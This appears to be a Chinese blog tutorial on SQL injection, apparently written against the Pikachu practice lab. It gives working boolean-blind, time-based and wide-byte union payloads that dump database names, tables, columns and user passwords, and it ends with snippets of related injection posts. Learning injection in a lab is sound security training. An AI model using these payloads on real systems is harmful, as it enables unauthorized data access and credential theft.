SQL注入之常見注入的步驟

2021-10-10 10:55:37 字數 1724 閱讀 1208

①判斷注入:name=kobe』 and 1=1 %23 正常, name=kobe』 and 1=2 報錯 存在注入

②通過length判斷資料庫的長度

name=kobe』 and length (database())>6 %23 正常,>7報錯 所以長度為7

③判斷資料庫第一位的ascii值

name=kobe』 and ascii(substr(database(),1,1))>111 正常 >112報錯 所以庫的第一位ascii值為112

④判斷資料表第一位的ascii值

name=kobe』 and ascii(substr((select table_name from information_schema.tables where table_schema=『pikachu』 limit 0,1),1,1))>103%23 正常 , >104報錯 ascii值為104

⑤判斷字段:與表類似

⑥判斷資料:

name=kobe』 and ascii(substr((select username from users limit 0,1 ),1,1)) >96 %23 正常, >97報錯 所以第乙個username的ascii值為97

①判斷注入:kobe』 and sleep(5) 延時5秒後才顯示,存在注入

②通過ascii判斷資料庫

kobe』 and if(ascii(substr(database(),1,1))>111,sleep(6),1) 有延遲 >112 無延遲 第一位ascii為112

③爆資料表

kobe』 and if(ascii(substr((select table_name from information_schema.tables where table_schema=『pikachu』 limit 0,1),1,1))>103,sleep(6),1)# 有延遲,>104無延遲 所以第一位ascii值為104

④爆資料列

kobe』 and if(ascii(substr((select column_name from information_schema.columns where table_name=『users』 limit 0,1),1,1))>116,sleep(6),1)# 有延遲,>117無延遲 所以第一位ascii值為116

⑤爆資料

kobe』 and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(3),1)# 有延遲, >101無延遲 所以第一位ascii值為101

①抓包②判斷注入:在後面加%df』看是否報錯,報錯為寬位元組注入

③判斷列數:name=a%df』 order by 3 報錯,order by 2 無報錯 為2列

④爆資料庫:name=a%df』 union select 1,database()%23

⑤爆資料表:name=-a%df』union select table_name,2 from information_schema.tables where table_schema=database()%23

⑥爆資料列name=-a%df』union select column_name,2 from information_schema.columns where table_name=『users』%23

⑦爆資料name=-a%df』union select concat(username,0x7e,password),2 from users%23

SQL注入之常見注入的步驟

第一步 抓包 第二步 判斷注入 id 1 and 1 1 正確 id 1 and1 2 報錯 第三步 判斷列數 id 1 order by 3 報錯 order by 2 正確 依此可以判斷為2列 第四步 爆顯示位 id 1 union select 1,2 可以爆出1或哪個是顯示位 第五步 爆資料...

SQL注入之常見注入的步驟

update注入 在修改資訊的時候,後台就是通過update去找操作的 insert注入 insert 注入是指我們前端註冊的資訊,後台就是通過 insert這個操作插入到資料庫中 在註冊資訊處抓包 insert判斷注入 單引號報錯 存在注入,報錯資訊為 1234 1 1 1 1 基於報錯資訊進行注...

SQL注入基本步驟

這篇文章將的比較好 sql注入基本步驟 1 注入點測試 2 查詢字段數 3 判斷回顯位 4 查詢資料庫的基本資訊 5 爆資料庫名 6 爆資料庫表名 7 爆欄位名 現在來介紹幾個在滲透測試中常用的幾個函式和表庫名。hostname 主機名稱 datadir 返回資料庫的儲存目錄 version com...